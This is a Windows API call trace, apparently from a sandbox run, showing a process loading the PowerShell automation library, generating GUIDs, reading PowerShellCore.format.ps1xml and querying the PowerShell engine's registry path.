	[0812.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0812.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0812.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0812.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0814.268] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7f3d9124, Data2=0xd210, Data3=0x44df, Data4=([0]=0x8f, [1]=0x50, [2]=0x77, [3]=0xde, [4]=0xb9, [5]=0x50, [6]=0x7b, [7]=0xfb))) returned 0x0
	[0814.269] VirtualQuery (in: lpAddress=0x12b720, lpBuffer=0x12c5e0, dwLength=0x30 | out: lpBuffer=0x12c5e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0814.270] VirtualQuery (in: lpAddress=0x12b7b0, lpBuffer=0x12c670, dwLength=0x30 | out: lpBuffer=0x12c670*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0815.528] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xf94d75a3, Data2=0x993b, Data3=0x40de, Data4=([0]=0x8b, [1]=0xef, [2]=0x92, [3]=0x59, [4]=0xb, [5]=0x26, [6]=0x25, [7]=0xd6))) returned 0x0
	[0815.551] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xeaf0cb0b, Data2=0x428e, Data3=0x4bef, Data4=([0]=0xa9, [1]=0x57, [2]=0x0, [3]=0x98, [4]=0x46, [5]=0x9e, [6]=0xb4, [7]=0x2))) returned 0x0
	[0815.551] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x8d134321, Data2=0x67af, Data3=0x4821, Data4=([0]=0x87, [1]=0x3c, [2]=0x5, [3]=0x66, [4]=0x4a, [5]=0x74, [6]=0xc, [7]=0x3))) returned 0x0
	[0815.553] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xde2b8351, Data2=0xcd53, Data3=0x42c9, Data4=([0]=0x86, [1]=0xf1, [2]=0x3, [3]=0x98, [4]=0xe6, [5]=0x83, [6]=0x50, [7]=0xb8))) returned 0x0
	[0815.554] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa9406420, Data2=0xd2d, Data3=0x44cb, Data4=([0]=0xbe, [1]=0x86, [2]=0x36, [3]=0xfc, [4]=0xe4, [5]=0xeb, [6]=0x91, [7]=0xa7))) returned 0x0
	[0815.555] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7d79bb77, Data2=0x2aa2, Data3=0x4925, Data4=([0]=0xbe, [1]=0xfb, [2]=0x63, [3]=0x31, [4]=0xf3, [5]=0x4f, [6]=0x23, [7]=0xc2))) returned 0x0
	[0815.555] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x822f3be4, Data2=0xf829, Data3=0x4c7c, Data4=([0]=0xa7, [1]=0xbb, [2]=0x81, [3]=0x41, [4]=0xea, [5]=0xde, [6]=0x23, [7]=0x2))) returned 0x0
	[0815.555] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xac7dc95a, Data2=0x4d39, Data3=0x4867, Data4=([0]=0x8a, [1]=0x61, [2]=0xb3, [3]=0x38, [4]=0x3c, [5]=0x5c, [6]=0xa9, [7]=0x10))) returned 0x0
	[0815.555] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xbd180cf1, Data2=0x919a, Data3=0x4fac, Data4=([0]=0x97, [1]=0x3, [2]=0xa7, [3]=0x2b, [4]=0x8a, [5]=0x81, [6]=0xa5, [7]=0xe4))) returned 0x0
	[0815.556] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3ea6a803, Data2=0x61f8, Data3=0x4bda, Data4=([0]=0xb9, [1]=0xcd, [2]=0x8d, [3]=0xb0, [4]=0x8b, [5]=0xa3, [6]=0xaf, [7]=0xf7))) returned 0x0
	[0815.556] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xd632df8c, Data2=0xb5d9, Data3=0x49e8, Data4=([0]=0xb3, [1]=0x39, [2]=0xe1, [3]=0x34, [4]=0xcc, [5]=0xc2, [6]=0xc7, [7]=0x6))) returned 0x0
	[0815.556] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa766458c, Data2=0x199a, Data3=0x44a7, Data4=([0]=0xad, [1]=0xd4, [2]=0xe3, [3]=0x0, [4]=0xe, [5]=0x87, [6]=0x98, [7]=0x4b))) returned 0x0
	[0815.557] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xade6745e, Data2=0x6ab3, Data3=0x430e, Data4=([0]=0xb5, [1]=0x3e, [2]=0x5f, [3]=0x2d, [4]=0x54, [5]=0xca, [6]=0x5e, [7]=0x53))) returned 0x0
	[0815.561] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7ced8333, Data2=0x9d1c, Data3=0x4558, Data4=([0]=0xaa, [1]=0xf0, [2]=0x79, [3]=0x67, [4]=0x26, [5]=0x43, [6]=0x2b, [7]=0x2a))) returned 0x0
	[0815.562] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x58141c1f, Data2=0x5e2a, Data3=0x4bbe, Data4=([0]=0xab, [1]=0x12, [2]=0x23, [3]=0x1a, [4]=0x96, [5]=0xb3, [6]=0xdb, [7]=0x1e))) returned 0x0
	[0815.562] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x550dca7c, Data2=0xa03c, Data3=0x4766, Data4=([0]=0xb7, [1]=0xcd, [2]=0x6c, [3]=0xcc, [4]=0x53, [5]=0x4f, [6]=0xb4, [7]=0xec))) returned 0x0
	[0815.562] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xd0c4da47, Data2=0x3433, Data3=0x4d45, Data4=([0]=0x91, [1]=0x2d, [2]=0xf2, [3]=0x91, [4]=0x25, [5]=0x40, [6]=0xaa, [7]=0xf))) returned 0x0
	[0815.563] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xcc9b1b5a, Data2=0x8c49, Data3=0x4bea, Data4=([0]=0x96, [1]=0xb9, [2]=0x50, [3]=0x1, [4]=0x89, [5]=0x13, [6]=0x8b, [7]=0x11))) returned 0x0
	[0815.563] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xdc2be467, Data2=0x98b6, Data3=0x414d, Data4=([0]=0xa6, [1]=0x55, [2]=0x6b, [3]=0xfe, [4]=0x94, [5]=0x62, [6]=0xc1, [7]=0xf))) returned 0x0
	[0815.563] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7e2449cf, Data2=0xe168, Data3=0x49f0, Data4=([0]=0x93, [1]=0x9c, [2]=0xaf, [3]=0x46, [4]=0xa0, [5]=0x55, [6]=0x67, [7]=0xbd))) returned 0x0
	[0815.563] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7ab48433, Data2=0xf57c, Data3=0x40e2, Data4=([0]=0xa5, [1]=0xfc, [2]=0x6a, [3]=0x51, [4]=0x6b, [5]=0xf9, [6]=0xb4, [7]=0x35))) returned 0x0
	[0815.564] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xbdaba6c1, Data2=0x3738, Data3=0x4232, Data4=([0]=0xae, [1]=0x8b, [2]=0x84, [3]=0xeb, [4]=0x24, [5]=0x62, [6]=0xfd, [7]=0x7))) returned 0x0
	[0815.564] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0815.564] GetFileType (hFile=0x2f8) returned 0x1
	[0815.564] SetErrorMode (uMode=0x1) returned 0x1
	[0815.564] GetFileType (hFile=0x2f8) returned 0x1
	[0815.564] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.565] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.565] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.566] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.566] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.566] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.566] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.567] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.567] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.568] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.568] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.568] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.568] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.569] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.569] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.569] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0815.569] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.882] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.882] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.883] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.883] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.883] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0xe67, lpOverlapped=0x0) returned 1
	[0816.884] ReadFile (in: hFile=0x2f8, lpBuffer=0x311e96f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311e96f*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0816.884] ReadFile (in: hFile=0x2f8, lpBuffer=0x311f3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x311f3a0*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0816.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0816.884] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0816.884] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0816.884] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0816.885] CoTaskMemFree (pv=0x1b8497b0) 
	[0816.885] RegCloseKey (hKey=0x2f8) returned 0x0
	[0816.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0816.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0816.886] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x8d20d6ca, Data2=0xe3ab, Data3=0x4fd1, Data4=([0]=0x84, [1]=0x5d, [2]=0x8, [3]=0xa5, [4]=0xe9, [5]=0x5c, [6]=0x0, [7]=0xb8))) returned 0x0
	[0816.887] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xf563ec64, Data2=0xac45, Data3=0x4a5d, Data4=([0]=0xa5, [1]=0x96, [2]=0xec, [3]=0xc4, [4]=0xc7, [5]=0xf, [6]=0x3f, [7]=0x4b))) returned 0x0
	[0816.887] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xdb7d26ff, Data2=0xafc2, Data3=0x4236, Data4=([0]=0xb7, [1]=0x99, [2]=0xbf, [3]=0x62, [4]=0xc4, [5]=0x33, [6]=0x6c, [7]=0xf6))) returned 0x0
	[0816.887] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xcbd049ff, Data2=0x4cab, Data3=0x4cf8, Data4=([0]=0xb3, [1]=0xba, [2]=0x13, [3]=0x26, [4]=0x74, [5]=0xa9, [6]=0xde, [7]=0xc7))) returned 0x0
	[0816.887] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x50a07e32, Data2=0x9e5e, Data3=0x45ff, Data4=([0]=0xbc, [1]=0x3, [2]=0x4a, [3]=0x52, [4]=0xb3, [5]=0x26, [6]=0xde, [7]=0x1))) returned 0x0
	[0816.887] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x8848d9de, Data2=0xf825, Data3=0x4e27, Data4=([0]=0x91, [1]=0x79, [2]=0x6, [3]=0x39, [4]=0x85, [5]=0xfd, [6]=0x4, [7]=0xb4))) returned 0x0
	[0816.888] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3f070ea5, Data2=0x931d, Data3=0x4875, Data4=([0]=0xb8, [1]=0xfd, [2]=0x25, [3]=0x45, [4]=0xfa, [5]=0xb3, [6]=0xc7, [7]=0x74))) returned 0x0
	[0816.888] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x4d9bd15a, Data2=0x6c7d, Data3=0x4f05, Data4=([0]=0xb6, [1]=0xe1, [2]=0x48, [3]=0x5d, [4]=0x2f, [5]=0x25, [6]=0x46, [7]=0x2))) returned 0x0
	[0816.888] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xfa7e9102, Data2=0xa50f, Data3=0x423e, Data4=([0]=0x96, [1]=0x6d, [2]=0xf7, [3]=0x7d, [4]=0x78, [5]=0x6c, [6]=0xc7, [7]=0x28))) returned 0x0
	[0816.888] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa4f2af39, Data2=0xb438, Data3=0x4591, Data4=([0]=0xb6, [1]=0x38, [2]=0xf6, [3]=0x91, [4]=0xc1, [5]=0x50, [6]=0xcf, [7]=0x4d))) returned 0x0
	[0816.888] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x43f4df68, Data2=0xd891, Data3=0x4cb8, Data4=([0]=0xb6, [1]=0x8c, [2]=0x9e, [3]=0x7e, [4]=0xcd, [5]=0x2c, [6]=0xe4, [7]=0xbd))) returned 0x0
	[0816.889] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x61ff45ba, Data2=0x6864, Data3=0x45c5, Data4=([0]=0xbb, [1]=0x8, [2]=0x7b, [3]=0x5a, [4]=0x78, [5]=0x65, [6]=0xd, [7]=0x68))) returned 0x0
	[0816.889] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xf2fd85b6, Data2=0xe0dc, Data3=0x464d, Data4=([0]=0xb9, [1]=0x69, [2]=0x68, [3]=0xa0, [4]=0xd9, [5]=0x57, [6]=0xc7, [7]=0xa9))) returned 0x0
	[0816.889] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xdbb9d9c5, Data2=0x5c18, Data3=0x48c7, Data4=([0]=0x8f, [1]=0xa8, [2]=0x78, [3]=0x0, [4]=0x1a, [5]=0x62, [6]=0x79, [7]=0xe6))) returned 0x0
	[0816.889] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe2d60ed0, Data2=0xd0b5, Data3=0x481c, Data4=([0]=0x98, [1]=0x3c, [2]=0xc6, [3]=0x3b, [4]=0x65, [5]=0x79, [6]=0x31, [7]=0xfe))) returned 0x0
	[0816.889] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x9f2ab6f7, Data2=0xb8a1, Data3=0x476c, Data4=([0]=0x94, [1]=0x90, [2]=0x5a, [3]=0x85, [4]=0x2b, [5]=0x92, [6]=0xdb, [7]=0x88))) returned 0x0
	[0816.889] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xaba941de, Data2=0x6287, Data3=0x4526, Data4=([0]=0x9a, [1]=0xf, [2]=0x9c, [3]=0xb2, [4]=0xb0, [5]=0x9b, [6]=0x91, [7]=0x1b))) returned 0x0
	[0816.890] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xf429641c, Data2=0xdf02, Data3=0x46dd, Data4=([0]=0xb5, [1]=0x17, [2]=0x81, [3]=0x66, [4]=0x9c, [5]=0xfd, [6]=0xeb, [7]=0xc))) returned 0x0
	[0816.890] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x1389431c, Data2=0x2a4b, Data3=0x4108, Data4=([0]=0xb5, [1]=0xff, [2]=0xdf, [3]=0xe2, [4]=0xc2, [5]=0xea, [6]=0xb2, [7]=0xd2))) returned 0x0
	[0816.890] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x65a1a615, Data2=0x1b40, Data3=0x45a5, Data4=([0]=0xa9, [1]=0x3a, [2]=0xbc, [3]=0x4f, [4]=0x64, [5]=0xf2, [6]=0x3c, [7]=0x33))) returned 0x0
	[0816.890] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xc564ae5b, Data2=0x9f13, Data3=0x452e, Data4=([0]=0xba, [1]=0x97, [2]=0x3e, [3]=0xe9, [4]=0xa, [5]=0xa1, [6]=0xe1, [7]=0xc7))) returned 0x0
	[0816.891] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x4e5ad2e9, Data2=0xf604, Data3=0x49ea, Data4=([0]=0xa9, [1]=0x81, [2]=0xd, [3]=0x82, [4]=0xc4, [5]=0xff, [6]=0xa8, [7]=0x34))) returned 0x0
	[0816.891] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3d3c2b5d, Data2=0xe6c2, Data3=0x4a9e, Data4=([0]=0xa4, [1]=0xdd, [2]=0xd0, [3]=0xc3, [4]=0xea, [5]=0x9e, [6]=0x48, [7]=0x2))) returned 0x0
	[0816.891] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xcf707616, Data2=0x4c3, Data3=0x4735, Data4=([0]=0xab, [1]=0x57, [2]=0x2f, [3]=0xd6, [4]=0x1c, [5]=0x1a, [6]=0xa9, [7]=0xb7))) returned 0x0
	[0816.891] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xd5690ac4, Data2=0xb6aa, Data3=0x4d8b, Data4=([0]=0xaf, [1]=0x47, [2]=0x84, [3]=0x76, [4]=0xe0, [5]=0xc8, [6]=0xf9, [7]=0x30))) returned 0x0
	[0816.891] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x937437e0, Data2=0xa616, Data3=0x4076, Data4=([0]=0xbc, [1]=0xf3, [2]=0x2, [3]=0x6c, [4]=0xdf, [5]=0x27, [6]=0xf7, [7]=0x5))) returned 0x0
	[0816.891] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x63d81954, Data2=0x2dfd, Data3=0x40cf, Data4=([0]=0x96, [1]=0xfd, [2]=0xc3, [3]=0x4c, [4]=0xde, [5]=0x4b, [6]=0xc7, [7]=0x62))) returned 0x0
	[0816.892] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x2c3c0dd2, Data2=0x8c19, Data3=0x4e93, Data4=([0]=0x88, [1]=0x56, [2]=0xea, [3]=0xf9, [4]=0x5d, [5]=0x62, [6]=0x86, [7]=0xa5))) returned 0x0
	[0816.892] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb0b92f55, Data2=0x727a, Data3=0x463d, Data4=([0]=0x8e, [1]=0x69, [2]=0x4d, [3]=0x24, [4]=0x77, [5]=0x5, [6]=0x8f, [7]=0xfe))) returned 0x0
	[0816.892] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x551336d2, Data2=0x817a, Data3=0x48ac, Data4=([0]=0xa6, [1]=0x4f, [2]=0xe, [3]=0x69, [4]=0xf0, [5]=0xca, [6]=0x52, [7]=0x35))) returned 0x0
	[0816.892] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb5ce6b03, Data2=0xb1ae, Data3=0x4d5a, Data4=([0]=0x8c, [1]=0xc3, [2]=0xe5, [3]=0xb, [4]=0x77, [5]=0x87, [6]=0x4, [7]=0x1e))) returned 0x0
	[0816.892] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x60702bc9, Data2=0xd825, Data3=0x4237, Data4=([0]=0x98, [1]=0x3e, [2]=0xd1, [3]=0xe0, [4]=0xa9, [5]=0x29, [6]=0x7e, [7]=0x32))) returned 0x0
	[0816.893] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3afec5f, Data2=0x1c76, Data3=0x4d26, Data4=([0]=0xbf, [1]=0x0, [2]=0x23, [3]=0x81, [4]=0x7c, [5]=0xea, [6]=0x64, [7]=0x5e))) returned 0x0
	[0816.899] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x6748b53a, Data2=0xd1a3, Data3=0x4b74, Data4=([0]=0x93, [1]=0x87, [2]=0xc7, [3]=0x7b, [4]=0x88, [5]=0x1d, [6]=0x88, [7]=0x67))) returned 0x0
	[0816.899] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xdd5a7e5a, Data2=0x5b44, Data3=0x4254, Data4=([0]=0xa1, [1]=0x48, [2]=0x48, [3]=0x17, [4]=0x42, [5]=0x68, [6]=0xdb, [7]=0x81))) returned 0x0
